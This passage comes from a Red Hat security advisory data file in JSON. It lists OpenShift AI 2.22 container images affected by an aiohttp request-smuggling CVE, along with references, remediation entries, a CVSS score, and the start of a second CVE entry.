"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-53643"
},
{
"category": "external",
"summary": "RHBZ#2380000",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380000"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-53643",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53643"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-53643",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53643"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/commit/e8d774f635dc6d1cd3174d0e38891da5de0e2b6a",
"url": "https://github.com/aio-libs/aiohttp/commit/e8d774f635dc6d1cd3174d0e38891da5de0e2b6a"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-9548-qrrj-x5pj",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-9548-qrrj-x5pj"
}
],
"release_date": "2025-07-14T20:17:18.247000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "aiohttp: AIOHTTP HTTP Request/Response Smuggling"
},
{
"cve": "CVE-2025-58183",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-10-29T23:01:50.573951+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
